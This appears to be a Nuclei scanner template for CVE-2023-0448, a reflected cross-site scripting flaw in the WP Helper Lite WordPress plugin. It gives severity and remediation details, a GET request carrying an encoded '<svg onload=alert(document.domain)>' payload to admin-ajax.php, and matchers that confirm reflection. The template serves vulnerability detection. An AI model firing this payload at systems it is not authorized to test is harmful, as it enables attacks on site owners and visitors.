45 lines
1.8 KiB
YAML
45 lines
1.8 KiB
YAML
id: CVE-2023-0448
|
|
|
|
info:
|
|
name: WP Helper Lite < 4.3 - Cross-Site Scripting
|
|
author: ritikchaddha
|
|
severity: medium
|
|
description: |
|
|
The WP Helper Lite WordPress plugin, in versions < 4.3, returns all GET parameters unsanitized in the response, resulting in a reflected cross-site scripting vulnerability.
|
|
impact: |
|
|
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
|
|
remediation: Fixed in version 4.3 and above
|
|
reference:
|
|
- https://wpscan.com/vulnerability/1f24db34-f608-4463-b4ee-9bc237774256
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-0448
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2023-0448
|
|
cwe-id: CWE-79
|
|
epss-score: 0.00078
|
|
epss-percentile: 0.32657
|
|
cpe: cpe:2.3:a:matbao:wp_helper_premium:*:*:*:*:*:wordpress:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: matbao
|
|
product: wp_helper_premium
|
|
framework: wordpress
|
|
publicwww-query: "/wp-content/plugins/wp-helper-lite"
|
|
tags: cve,cve2023,wordpress,wp,wp-plugin,wpscan,xss,wp-helper-lite,matbao
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=surveySubmit&a=%22%3E%3Csvg%20onload%3Dalert%28document.domain%29%3E"
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- 'status_code == 200'
|
|
- 'contains(header, "text/html")'
|
|
- 'contains(body, "><svg onload=alert(document.domain)>")'
|
|
- 'contains(body, "params\":{\"action")'
|
|
condition: and
|
|
# digest: 4a0a0047304502203284fa2cd4c61cd46c8ec4611d74232f7b04c464e0e99ba5bf7aa071e2f14ed1022100c373dec5f126a4152956472ee5cb773bed0a9846dc99b5d804ad582758b98a7c:922c64590222798bb761d5b6d8e72950 |